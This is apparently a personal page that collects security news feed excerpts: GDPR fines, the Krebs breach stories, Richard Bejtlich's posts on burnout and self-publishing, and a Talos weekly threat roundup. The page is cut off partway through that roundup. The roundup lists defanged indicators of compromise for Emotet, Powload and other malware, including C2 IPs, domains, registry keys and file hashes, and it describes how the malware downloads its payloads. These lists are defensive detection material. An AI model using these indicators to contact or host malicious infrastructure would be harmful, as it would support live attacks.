Security News from Some Sites I Watch

Threatpost | The first stop for security news The First Stop For Security News

The Hacker News The Hacker News has been internationally recognized as a leading news source dedicated to promoting awareness for security experts and hackers

  • Google fined $57 million by France for lack of transparency and consent
    by noreply@blogger.com (Mohit Kumar) on January 21, 2019 at 6:54 pm

    The French data protection watchdog CNIL has issued its first fine of €50 million (around $57 million) under the European Union’s new General Data Protection Regulation (GDPR) law that came into force in May last year. The fine has been levied on Google for “lack of transparency, inadequate information and lack of valid consent regarding the ads personalization,” the CNIL (National Data […]

  • New malware found using Google Drive as its command-and-control server
    by noreply@blogger.com (Mohit Kumar) on January 21, 2019 at 5:04 pm

    Since most security tools also keep an eye on the network traffic to detect malicious IP addresses, attackers are increasingly adopting infrastructure of legitimate services in their attacks to hide their malicious activities. Cybersecurity researchers have now spotted a new malware attack campaign linked to the notorious DarkHydrus APT group that uses Google Drive as its command-and-control ( […]

  • Alleged Russian Hacker Pleads Not Guilty After Extradition to United States
    by noreply@blogger.com (Wang Wei) on January 21, 2019 at 9:42 am

    A Russian hacker indicted by a United States court for his involvement in online ad fraud schemes that defrauded multiple American companies out of tens of millions of dollars pleaded not guilty on Friday in a courtroom in Brooklyn, New York. Aleksandr Zhukov, 38, was arrested in November last year by Bulgarian authorities after the U.S. issued an international warrant against him, and was […]

  • New Android Malware Apps Use Motion Sensor to Evade Detection
    by noreply@blogger.com (Mohit Kumar) on January 18, 2019 at 11:37 am

    Even after so many efforts by Google for preventing its Play Store from malware, shady apps somehow managed to fool its anti-malware protections and get into its service to infect Android users with malware. Two such Android apps have recently been spotted on the Google Play Store by security researchers with the Trend Micro malware research team, infecting thousands of Android users who hav […]

  • A Twitter Bug Left Android Users’ Private Tweets Exposed For 4 Years
    by noreply@blogger.com (Swati Khandelwal) on January 18, 2019 at 6:49 am

    Twitter just admitted that the social network accidentally revealed some Android users’ protected tweets to the public for more than 4 years — a kind of privacy blunder that you’d typically expect from Facebook. When you sign up for Twitter, all your Tweets are public by default, allowing anyone to view and interact with your Tweets. Fortunately, Twitter also gives you control of your […]

Krebs on Security In-depth security news and investigation

  • 773M Password ‘Megabreach’ is Years Old
    by BrianKrebs on January 17, 2019 at 8:11 pm

    My inbox and Twitter messages positively lit up today with people forwarding stories from Wired and other publications about a supposedly new trove of nearly 773 million unique email addresses and 21 million unique passwords that were posted to a hacking forum. A story in The Guardian breathlessly dubbed it “the largest collection ever of breached data found.” But in an interview with the apparent seller, KrebsOnSecurity learned that it is not even close to the largest gathering of stolen data, and that it is at least two to three years old. […]

  • “Stole $24 Million But Still Can’t Keep a Friend”
    by BrianKrebs on January 16, 2019 at 12:52 am

    Unsettling new claims have emerged about Nicholas Truglia, a 21-year-old Manhattan resident accused of hijacking cell phone accounts to steal tens of millions of dollars in cryptocurrencies from victims. The lurid details, made public in a civil lawsuit filed this week by one of his alleged victims, paints a chilling picture of a man addicted to thievery and all its trappings. The documents suggest that Truglia stole from his father and even a dead man — all the while lamenting that his fabulous new wealth brought him nothing but misery. […]

  • Courts Hand Down Hard Jail Time for DDoS
    by BrianKrebs on January 14, 2019 at 7:37 pm

    Seldom do people responsible for launching crippling cyberattacks face justice, but increasingly courts around the world are making examples of the few who do get busted for such crimes. On Friday, a 34-year-old Connecticut man received a whopping 10-year prison sentence for carrying out distributed denial-of-service (DDoS) attacks against a number of hospitals in 2014. Also last week, a 30-year-old in the United Kingdom was sentenced to 32 months in jail for using an army of hacked devices to crash large portions of Liberia’s Internet access in 2016. […]

  • Secret Service: Theft Rings Turn to Fuze Cards
    by BrianKrebs on January 10, 2019 at 4:27 pm

    Street thieves who specialize in cashing out stolen credit and debit cards increasingly are hedging their chances of getting caught carrying multiple counterfeit cards by relying on Fuze Cards, a smartcard technology that allows users to store dozens of cards on a single device, the U.S. Secret Service warns. […]

  • Patch Tuesday, January 2019 Edition
    by BrianKrebs on January 9, 2019 at 2:46 pm

    Microsoft on Tuesday released updates to fix roughly four dozen security issues with its Windows operating systems and related software. All things considered, this first Patch Tuesday of 2019 is fairly mild, bereft as it is of any new Adobe Flash updates or zero-day exploits. But there are a few spicy bits to keep in mind. Read on for the gory details. […]

BleepingComputer BleepingComputer – All Stories

TaoSecurity Richard Bejtlich’s blog on digital security, strategic thought, and military history.

  • Happy 16th Birthday TaoSecurity Blog
    by noreply@blogger.com (Richard Bejtlich) on January 8, 2019 at 2:03 pm

    Today, 8 January 2019, is TaoSecurity Blog’s 16th birthday! This is also my 3,041st blog post.I wrote my first post on 8 January 2003 while working as an incident response consultant for Foundstone.Here are a few statistics on the blog. Blogger started providing statistics in May 2010, so these apply to roughly the past 9 years only.As of today, since May 2010 the blog has nearly 9.4 million all time page views, up from 7.7 million a year ago.Here are the most popular posts of the last 9 years, as of today:I’m blogging a bit more recently, with 22 posts in 2018 — more than my total for 2016 and 2017 combined, but still not half as much as 2015, which saw 55 posts.Twitter continues to play a role in the way I communicate. Last year @taosecurity had nearly 49,000 followers with less than 18,000 Tweets. Today I have nearly 53,000 followers with 19,000 Tweets.My rule is generally this: if I start wondering how to fit an idea in 280 characters on Twitter, then a blog post is a better idea. If I start a Twitter “thread,” then I really need to write a blog post!I continue to blog about martial arts and related topics at Rejoining the Tao, which incidentally will be three years old later this month, and is currently 11 posts shy of 100. You can see that during my burnout period I shifted my writing and creativity outside of security.Thank you to everyone who has been part of this blog’s journey since 2003!Copyright 2003-2018 Richard Bejtlich and TaoSecurity (taosecurity.blogspot.com and www.taosecurity.com) […]

  • Notes on Self-Publishing a Book
    by noreply@blogger.com (Richard Bejtlich) on January 7, 2019 at 3:17 pm

    In this post I would like to share a few thoughts on self-publishing a book, in case anyone is considering that option.As I mentioned in my post on burnout, one of my goals was to publish a book on a subject other than cyber security. A friend from my Krav Maga school, Anna Wonsley, learned that I had published several books, and asked if we might collaborate on a book about stretching. The timing was right, so I agreed.I published my first book with Pearson and Addison-Wesley in 2004, and my last with No Starch in 2013. 14 years is an eternity in the publishing world, and even in the last 5 years the economics and structure of book publishing have changed quite a bit.To better understand the changes, I had dinner with one of the finest technical authors around, Michael W. Lucas. We met prior to my interest in this book, because I had wondered about publishing books on my own. MWL started in traditional publishing like me, but has since become a full-time author and independent publisher. He explained the pros and cons of going it alone, which I carefully considered.By the end of 2017, Anna and I were ready to begin work on the book. I believe our first “commits” occurred in December 2017.For this stretching book project, I knew my strengths included organization, project management, writing to express another person’s message, editing, and access to a skilled lead photographer. I learned that my co-author’s strengths included subject matter expertise, a willingness to be photographed for the book’s many pictures, and friends who would also be willing to be photographed.None of us was very familiar with the process of transforming a raw manuscript and photos into a finished product. When I had published with Pearson and No Starch, they took care of that process, as well as copy-editing.Beyond turning manuscript and photos into a book, I also had to identify a publication platform. Early on we decided to self-publish using one of the many newer companies offering that service. We wanted a company that could get our book into Amazon, and possibly physical book stores as well. We did not want to try working with a traditional publisher, as we felt that we could manage most aspects of the publishing process ourselves, and augment with specialized help where needed.After a lot of research we chose Blurb. One of the most attractive aspects of Blurb was their expert ecosystem. We decided that we would hire one of these experts to handle the interior layout process. We contacted Jennifer Linney, who happened to be local and had experience publishing books to Amazon. We met in person, discussed the project, and agreed to move forward together.I designed the structure of the book. As a former Air Force officer, I was comfortable with the “rule of threes,” and brought some recent writing experience from my abandoned PhD thesis.I designed the book to have an introduction, the main content, and a conclusion. Within the main content, the book featured an introduction and physical assessment, three main sections, and a conclusion. The three main sections consisted of a fundamental stretching routine, an advanced stretching routine, and a performance enhancement section — something with Indian clubs, or kettle bells, or another supplement to stretching.Anna designed all of the stretching routines and provided the vast majority of the content. She decided to focus on three physical problem areas — tight hips, shoulders/back, and hamstrings. We encouraged the reader to “reach three goals” — open your hips, expand your shoulders, and touch your toes. Anna designed exercises that worked in a progression through the body, incorporating her expertise as a certified trainer and professional martial arts instructor.Initially we tried a process whereby she would write section drafts, and I would edit them, all using Google Docs. This did not work as well as we had hoped, and we spent a lot of time stalled in virtual collaboration.By the spring of 2018 we decided to try meeting in person on a regular basis. Anna would explain her desired content for a section, and we would take draft photographs using iPhones to serve as placeholders and to test the feasibility of real content. We made a lot more progress using these methods, although we stalled again mid-year due to schedule conflicts.By October our text was ready enough to try taking book-ready photographs. We bought photography lights from Amazon and used my renovated basement game room as a studio. We took pictures over three sessions, with Anna and her friend Josh as subjects. I spent several days editing the photos to prepare for publication, then handed the bundled manuscript and photographs to Jennifer for a light copy-edit and layout during November.Our goal was to have the book published before the end of the year, and we met that goal. We decided to offer two versions. The first is a “collector’s edition” featuring all color photographs, available exclusively via Blurb as Reach Your Goal: Collector’s Edition. The second will be available at Amazon in January, and will feature black and white photographs.While we were able to set the price of the book directly via Blurb, we could basically only suggest a price to Ingram and hence to Amazon. Ingram is the distributor that feeds Amazon and physical book stores. I am curious to see how the book will appear in those retail locations, and how much it will cost readers. We tried to price it competitively with older stretching books of similar size. (Ours is 176 pages with over 200 photographs.)Without revealing too much of the economic structure, I can say that it’s much cheaper to sell directly from Blurb. Their cost structure allows us to price the full color edition competitively. However, one of our goals was to provide our book through Amazon, and to keep the price reasonable we had to sell the black and white edition outside of Blurb.Overall I am very pleased with the writing process, and exceptionally happy with the book itself. The color edition is gorgeous and the black and white version is awesome too.The only change I would have made to the writing process would have been to start the in-person collaboration from the beginning. Working together in person accelerated the transfer of ideas to paper and played to our individual strengths of Anna as subject matter expert and me as a writer.In general, I would not recommend self-publishing if you are not a strong writer. If writing is not your forte, then I highly suggest you work with a traditional publisher, or contract with an editor. I have seen too many self-published books that read terribly. This usually happens when the author is a subject matter expert, but has trouble expressing ideas in written form.The bottom line is that it’s never been easier to make your dream of writing a book come true. There are options for everyone, and you can leverage them to create wonderful products that scale with demand and can really help your audience reach their goals!If you want to start the new year with better flexibility and fitness, consider taking a look at our book on Blurb! When the Amazon edition is available I will update this post with a link.Update: Here is the Amazon listing.Cross-posted from Rejoining the Tao Blog.Copyright 2003-2018 Richard Bejtlich and TaoSecurity (taosecurity.blogspot.com and www.taosecurity.com) […]

  • Managing Burnout
    by noreply@blogger.com (Richard Bejtlich) on December 21, 2018 at 9:30 pm

    This is not strictly an information security post, but the topic likely affects a decent proportion of my readership.Within the last few years I experienced a profound professional “burnout.” I’ve privately mentioned this to colleagues in the industry, and heard similar stories or requests for advice on how to handle burnout.I want to share my story in the hopes that it helps others in the security scene, either by coping with existing burnout or preparing for a possible burnout.How did burnout manifest for me? It began with FireEye’s acquisition of Mandiant, almost exactly five years ago. 2013 was a big year for Mandiant, starting with the APT1 report in early 2013 and concluding with the acquisition in December.The prospect of becoming part of a Silicon Valley software company initially seemed exciting, because we would presumably have greater resources to battle intruders. Soon, however, I found myself at odds with FireEye’s culture and managerial habits, and I wondered what I was doing inside such a different company.(It’s important to note that the appointment of Kevin Mandia as CEO in June 2016 began a cultural and managerial shift. I give Kevin and his lieutenants credit for helping transform the company since then. Kevin’s appointment was too late for me, but I applaud the work he has done over the last few years.)Starting in late 2014 and progressing in 2015, I became less interested in security. I was aggravated every time I saw the same old topics arise in social or public media. I did not see the point of continuing to debate issues which were never solved. I was demoralized and frustrated.At this time I was also working on my PhD with King’s College London. I had added this stress myself, but I felt like I could manage it. I had earned two major and two minor degrees in four years as an Air Force Academy cadet. Surely I could write a thesis!Late in 2015 I realized that I needed to balance the very cerebral art of information security with a more physical activity. I took a Krav Maga class the first week of January 2016. It was invigorating and I began a new blog, Rejoining the Tao, that month. I began to consider options outside of informations security.In early 2016 my wife began considering ways to rejoin the W-2 workforce, after having stayed home with our kids for 12 years. We discussed the possibility of me leaving my W-2 job and taking a primary role with the kids. By mid-2016 she had a new job and I was open to departing FireEye.By late 2016 I also realized that I was not cut out to be a PhD candidate. Although I had written several books, I did not have the right mindset or attitude to continue writing my thesis. After two years I quit my PhD program. This was the first time I had quit anything significant in my life, and it was the right decision for me. (The Churchill “never, never, never give up” speech is fine advice when defending your nation’s existence, but it’s stupid advice if you’re not happy with the path you’re following.)In March 2017 I posted Bejtlich Moves On, where I said I was leaving FireEye. I would offer security consulting in the short term, and would open a Krav Maga school in the long-term. This was my break with the security community and I was happy to make it. I blogged on security only five more times in 2017.(Incidentally, one very public metric for my burnout experience can be seen in my blog output. In 2015 I posted 55 articles, but in 2016 I posted only 8, and slightly more, 12, in 2017. This is my 21st post of 2018.)I basically took a year off from information security. I did some limited consulting, but Mrs B paid the bills, with some support from my book royalties and consulting. This break had a very positive effect on my mental health. I stayed aware of security developments through Twitter, but I refused to speak to reporters and did not entertain job offers.During this period I decided that I did not want to open a Krav Maga school and quit my school’s instructor development program. For the second time, I had quit something I had once considered very important.I started a new project, though — writing a book that had nothing to do with information security. I will post about it shortly, as I am finalizing the cover with the layout team this weekend!By the spring of 2018 I was able to consider returning to security. In May I blogged that I was joining Splunk, but that lasted only two months. I realized I had walked into another cultural and managerial mismatch. Near the end of that period, Seth Hall from Corelight contacted me, and by July 20th I was working there. We kept it quiet until September. I have been very happy at Corelight, finally finding an environment that matches my temperament, values, and interests.My advice to those of you who have made it this far:If you’re feeling burnout now, you’re not alone. It happens. We work in a stressful industry that will take everything that you can give, and then try to take more. It’s healthy and beneficial to push back. If you can, take a break, even if it means only a partial break.Even if you can’t take a break, consider integrating non-security activities into your lifestyle — the more physical, the better. Security is a very cerebral activity, often performed in a sedentary manner. You have a body and taking care of it will make your mind happier too.If you’re not feeling burnout now, I recommend preparing for a possible burnout in the future. In addition to the advice in the previous paragraphs, take steps now to be able to completely step away from security for a defined period. Save a proportion of your income to pay your bills when you’re not working in security. I recommend at least a month, but up to six months if you can manage it.This is good financial advice anyway, in the event you were to lose your job. This is not an emergency fund, though — this is a planned reprieve from burnout. We are blessed in security to make above-average salaries, so I suggest saving for retirement, saving for layoffs, and saving for burnout.Finally, it’s ok to talk to other people about this. This will likely be a private conversation. I don’t see too many people saying “I’m burned out!” on Twitter or in a blog post. I only felt comfortable writing this post months after I returned to regular security work.I’m very interested in hearing what others have to say on this topic. Replying to my Twitter announcement for the blog post is probably the easiest step. I moderate the comments here and might not get to them in a timely manner.Copyright 2003-2018 Richard Bejtlich and TaoSecurity (taosecurity.blogspot.com and www.taosecurity.com) […]

  • The Origin of the Quote “There Are Two Types of Companies”
    by noreply@blogger.com (Richard Bejtlich) on December 18, 2018 at 4:22 pm

    While listening to a webcast this morning, I heard the speaker mentionThere are two types of companies: those who have been hacked, and those who don’t yet know they have been hacked.He credited Cisco CEO John Chambers but didn’t provide any source.That didn’t sound right to me. I could think of two possible antecedents. so I did some research. I confirmed my memory and would like to present what I found here.John Chambers did indeed offer the previous quote, in a January 2015 post for the World Economic Forum titled What does the Internet of Everything mean for security? Unfortunately, neither Mr Chambers nor the person who likely wrote the article for him decided to credit the author of this quote.Before providing proper credit for this quote, we need to decide what the quote actually says. As noted in this October 2015 article by Frank Johnson titled Are there really only “two kinds of enterprises”?, there are really (at least) two versions of this quote:A popular meme in the information security industry is, “There are only two types of companies: those that know they’ve been compromised, and those that don’t know.”And the second is like unto it: “There are only two kinds of companies: those that have been hacked, and those that will be.”We see that the first is a version of what Mr Chambers said. Let’s call that 2-KNOW. The second is different. Let’s call that 2-BE.The first version, 2-KNOW, can be easily traced and credited to Dmitri Alperovitch. He stated this proposition as part of the publicity around his Shady RAT report, written while he worked at McAfee. For example, this 3 August 2011 story by Ars Technica, Operation Shady RAT: five-year hack attack hit 14 countries, quotes Dmitri in the following:So widespread are the attacks that Dmitri Alperovitch, McAfee Vice President of Threat Research, said that the only companies not at risk are those who have nothing worth taking, and that of the world’s biggest firms, there are just two kinds: those that know they’ve been compromised, and those that still haven’t realized they’ve been compromised.Dmitri used slightly different language in this popular Vanity Fair article from September 2011, titled Enter the Cyber-Dragon:Dmitri Alperovitch, who discovered Operation Shady rat, draws a stark lesson: “There are only two types of companies—those that know they’ve been compromised, and those that don’t know. If you have anything that may be valuable to a competitor, you will be targeted, and almost certainly compromised.”No doubt former FBI Director Mueller read this report (and probably spoke with Dmitri). He delivered a speech at RSA on 1 March 2012 that introduced question 2-BE into the lexicon, plus a little more:For it is no longer a question of “if,” but “when” and “how often.”I am convinced that there are only two types of companies: those that have been hacked and those that will be. And even they are converging into one category: companies that have been hacked and will be hacked again.  Here we see Mr Mueller morphing Dmitri’s quote, 2-KNOW, into the second, 2-BE. He also introduced a third variant — “companies that have been hacked and will be hacked again.” Let’s call this version 2-AGAIN.The very beginning of Mr Mueller’s quote is surely a play on Kevin Mandia’s long-term commitment to the inevitability of compromise. However, as far as I could find, Kevin did not use the “two companies” language.One article that mentions version 2-KNOW and Kevin is this December 2014 Ars Technica article titled “Unprecedented” cyberattack no excuse for Sony breach, pros say. However, the article is merely citing other statements by Kevin along with the aphorism of version 2-KNOW.Finally, there’s a fourth version introduced by Mr Mueller’s successor, James Comey, as well! In a 6 October 2014 story, FBI Director: China Has Hacked Every Big US Company Mr Comey said:Speaking to CBS’ 60 Minutes, James Comey had the following to say on Chinese hackers: There are two kinds of big companies in the United States. There are those who’ve been hacked by the Chinese and those who don’t know they’ve been hacked by the Chinese.Let’s call this last variant 2-CHINA.To summarize, there are four versions of the “two companies” quote:2-KNOW, credited to Dmitri Alperovitch in 2011, says “There are only two types of companies—those that know they’ve been compromised, and those that don’t know.”2-BE, credited to Robert Mueller in 2012, says “[T]here are only two types of companies: those that have been hacked and those that will be.”2-AGAIN, credited to Robert Mueller in 2012, says “[There are only two types of companies:] companies that have been hacked and will be hacked again.”2-CHINA, credited to James Comey in 2014, says “There are two kinds of big companies in the United States. There are those who’ve been hacked by the Chinese and those who don’t know they’ve been hacked by the Chinese.”Now you know!Copyright 2003-2018 Richard Bejtlich and TaoSecurity (taosecurity.blogspot.com and www.taosecurity.com) […]

  • On “Advanced” Network Security Monitoring
    by noreply@blogger.com (Richard Bejtlich) on December 14, 2018 at 3:16 pm

    My TaoSecurity News page says I taught 41 classes lasting a day or more, from 2002 to 2014. All of these involved some aspect of network security monitoring (NSM). Many times students would ask me when I would create the “advanced” version of the class, usually in the course feedback. I could never answer them, so I decided to do so in this blog post.The short answer is this: at some point, advanced NSM is no longer NSM. If you consider my collection – analysis – escalation – response model, NSM extensions from any of those phases quickly have little or nothing to do with the network.Here are a few questions I have received concerned “advanced NSM,” paired with the answers I could have provided.Q: “I used NSM to extract a binary from network traffic. What do I do with this binary?”A: “Learn about reverse engineering and binary analysis.”Or:Q: “I used NSM to extra Javascript from a malicious Web page. What do I do with this Javascript?”A: “Learn about Javascript de-obfuscation and programming.”Or:Q: “I used NSM to capture an exchange between a Windows client and a server. What does it mean?”A: “Learn about Server Message Block (SMB) or Common Internet File System (CIFS).”Or:Q: “I used NSM to capture cryptographic material exchanged between a client and a server. How do I understand it?”A: “Learn about cryptography.”Or:Q: “I used NSM to grab shell code passed with an exploit against an Internet-exposed service. How do I tell what it does?”A: “Learn about programming in assembly.”Or:Q: “I want to design custom hardware for packet capture. How do I do that?”A: “Learn about programming ASICs (application specific integrated circuits).”I realized that I had the components of all of this “advanced NSM” material in my library. I had books on reverse engineering and binary analysis, Javascript, SMB/CIFS, cryptography, assembly programming, ASICs, etc.The point is that eventually the NSM road takes you to other aspects of the cyber security landscape.Are there *any* advanced area for NSM? One could argue that protocol analysis, as one finds in tools like Bro, Suricata, Snort, Wireshark, and so on constitute advanced NSM. However, you could just as easily argue that protocol analysis becomes more about understanding the programming and standards behind each of the protocols.In brief, to learn advanced NSM, expand beyond NSM.Copyright 2003-2018 Richard Bejtlich and TaoSecurity (taosecurity.blogspot.com and www.taosecurity.com) […]

Naked Security Computer Security News, Advice and Research

WeLiveSecurity News, views, and insight from the ESET security community

Talos Blog Talos Group, by Cisco

  • Threat Roundup for Jan. 11 to Jan. 18
    by noreply@blogger.com (William Largent) on January 18, 2019 at 11:15 pm

    Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Jan. 11 and Jan. 18. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.The most prevalent threats highlighted in this roundup are:Win.Malware.Emotet-6816461-0 Malware Emotet is a banking trojan that remains relevant due to its ability to evolve and bypass antivirus products. It is commonly spread via malicious email attachments and links. Doc.Malware.Powload-6815340-0 Malware Powload is a malicious document that uses PowerShell to download malware. This campaign is currently distributing the Emotet malware. Win.Downloader.Upatre-6815606-0 Downloader Upatre is a trojan that is often delivered through spam emails with malicious attachments or links. It is known to be a downloader and installer for other malware. Doc.Malware.Sagent-6813871-0 Malware Sagent launches PowerShell through macros in Microsoft Office documents. The PowerShell then downloads unwanted software from remote websites.  Win.Virus.Sality-6814419-0 Virus Sality is a file infector that establishes a peer-to-peer botnet. Although it’s been prevalent for more than a decade, we continue to see new samples that require marginal attention in order to remain consistent with detection. Once a Sality client bypasses perimeter security, its goal is to execute a downloader component capable of executing additional malware. Win.Packed.Johnnie-6814043-0 Packed Johnnie, also known as Mikey, is a malware family that focuses on persistence and is known for its plugin architecture. Win.Downloader.Powershell-6810733-0 Downloader This cluster came with spam emails containing zipped JavaScript attachments. Once the user runs the file, these malicious JavaScript attachments use PowerShell and BITSAdmin to download and install the Gandcrab ransomware. ThreatsWin.Malware.Emotet-6816461-0Indicators of CompromiseRegistry Keys<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: Type<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: Start<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: ErrorControl<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: ImagePath<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: DisplayName<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: WOW64<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: ObjectName<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: Description<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED Value Name: Type<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED Value Name: Start<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED Value Name: ErrorControl<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED Value Name: ImagePath<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED Value Name: DisplayName<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED Value Name: WOW64<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED Value Name: ObjectName<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED Value Name: DescriptionMutexesGlobal\I98B68E3CGlobal\M98B68E3CIP Addresses contacted by malware. Does not indicate maliciousness187[.]207[.]58[.]148187[.]178[.]233[.]96Domain Names contacted by malware. Does not indicate maliciousnesssmtpauth[.]avalongroup[.]insmtp[.]weiler-elektro[.]demail[.]yomarbodycolor[.]com[.]mxmail[.]theconcordhotels[.]commail[.]migranjita[.]com[.]mxFiles and or directories created%WinDir%\SysWOW64\t5lKUp7.exe%WinDir%\SysWOW64\ohFmRm3hO8ae.exe%WinDir%\SysWOW64\XyDDS09O1vT.exe%WinDir%\SysWOW64\ouFc.exeFile Hashes0353c9149b5f88a330904bb62b32224f04ba58f03d68dd0792757ad775308b5504353446c29fd35b28ee9b67f8bd44979478501cca7c954753a79c52b68d903704c3f1590c9e9389582e21d7711379cab42d460433a2918bb888ce941bcfeedd0753b4ea09e7c562abacd4d3fbb6ceb8065075fa7e9ac3d53a7d7b9464111d9707a40319b4eab80ad4bc5ddd1d326b380fbd84cb5695436ad973026f10b2ffcf09dfb7b98eb9d84194c786107af24f345ba98abce2264eb350aaa49ec5f0b2a30a05e728e40d80db4159ced8760ade6cc66cd1d1c3187bc389801f975ea356a50b664accc6898a9c073ca27deb58abaa597477d88c54559439f9a92a45f8d0550e0838d60693a9fe803d104f97b1513781460a3e0eeedc0add12d9cab9d57b890e5731849a5274705251a772b9cfc527d4646e5af1d0d8a9c0dc536d3a60ef7311c6c26f9d485fa833fc457cc51a99e9b772c36816fc6c3bd55d3cd10b3722be16d620b02bdf396a3992dc4b2ef8d2508924303e4c013e1fbb4992147000851617061a6389a454eb7b2891b19708d0a2b54a6c4b4ce5fb20070475e0eec9420219b0b0087b81e9c2c6b5c94a7830fcb2674318a32eb7b7f22beac0c21f7afe6e1cea1c276ebbfb7016b71f5c4060ebda6771c82f8a7f7b1de17469f564cdd4ec1fb31fd9d68cdf3e7003c8312920f47279c35d5e6a57072274c347abfa72546f2304f4a6d495ffbe53edf321320c3d9c370f2ed04881481219e54b76877df66f296f421a8f830c9b249dda7b08603ef70b9940165b22c323c81ac63f026e3b142b9278f08544327a17740022286878835f952b3e419f6eb591d266af5fe9d95e2e26453cbe70950db2ff2866374eb65199158432518df90130d616d2fa0dc0d132a25295271b2091b10533f3beb8f9b032ef32668f3081c9f1c44e8e6017f3253388ba07c6f77b926395f7638848aae558ea5804e09c82e441e03530e7c69d6333906f0abea0b36325a9fae790527fd5317485426c70801600e129795af7f0f9350f42856e87c939fbc0a994c5ee8df09e056c449931320e7a2ed633b62e7f2e3759184ad0939d60725e52abf38493808986f7ebcf81b8037beceb4a50539602Coverage Screenshots of DetectionAMPThreatGridUmbrellaDoc.Malware.Powload-6815340-0Indicators of CompromiseRegistry Keys<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: Type<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: Start<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: ErrorControl<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: ImagePath<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: DisplayName<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: WOW64<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: ObjectName<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABBTNFETCH Value Name: DescriptionMutexesGlobal\I98B68E3CGlobal\M98B68E3CIP Addresses contacted by malware. Does not indicate maliciousness187[.]163[.]213[.]12468[.]66[.]216[.]25Domain Names contacted by malware. Does not indicate maliciousnesswww[.]dawsonvillepropertymanagement[.]comFiles and or directories created%WinDir%\SysWOW64\tabbtnfetcha.exe%UserProfile%\664.exe%LocalAppData%\Temp\drp4vham.v1t.ps1%LocalAppData%\Temp\h224jefh.5gj.psm1File Hashes016449ce658b591c81a660cdf3aa38bfff92a5f107ba172c31e127954b36e34428cf4ee192bfbf24ef0bc9a8eff889501ddaf08031c4c369035ddeec949e28793356b99748cd869b64a8be09de12dc8af1f417acd040e6ca4d80344ad58eb62c33bc3b2d5e4464eb9a12fcbdd7a4dc0a6e7c02f3e2149325f473e1d59c019022388fe279f421985cb9e147aaf8231a98c832874952c396a13df08894c3a9714d38e53d78bb20c1475bb99e81348df948a7a2a7c54e553f7a07297e53de59ea15581e775919ebf602a88369287a40c6b746ebf0a6e4f631c627091527690ab6c35a2e46067d3710ece2abdb092e7a3e49075ca19d0849e6499fb7953c28a9ec8e8c2bd29b1fc6bb1e3187ba8cf8329847e419fe62b6ed3f2e054991dcade63ddaaa800f12bc65cd7580d5f75a3b19de5333ccba6b81a4d7df58556c7878a4d82ab5d324893085f52a6b7d750b41d3039462d0e66e2e07f36d7aa07ab53f694790c7cb43c0854e5691b41f80496be003f9c1741e2921e5ee039645e220190162a2d7e114011982bf58dbd1752874d27895b1716fc1a0a02f8515a3384c9dde7a97Coverage Screenshots of DetectionAMPThreatGridMalwareWin.Downloader.Upatre-6815606-0Indicators of CompromiseRegistry Keys<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS Value Name: ProxyEnable<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS Value Name: ProxyServer<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS Value Name: ProxyOverride<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS Value Name: AutoConfigURL<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS Value Name: AutoDetect<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP Value Name: ProxyBypass<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP Value Name: IntranetName<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP Value Name: UNCAsIntranet<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP Value Name: AutoDetectMutexesLocal\ZonesCacheCounterMutexLocal\ZonesLockedCacheCounterMutexLocal\MSCTF.Asm.MutexDefault1IP Addresses contacted by malware. Does not indicate maliciousness84[.]22[.]177[.]39Domain Names contacted by malware. Does not indicate 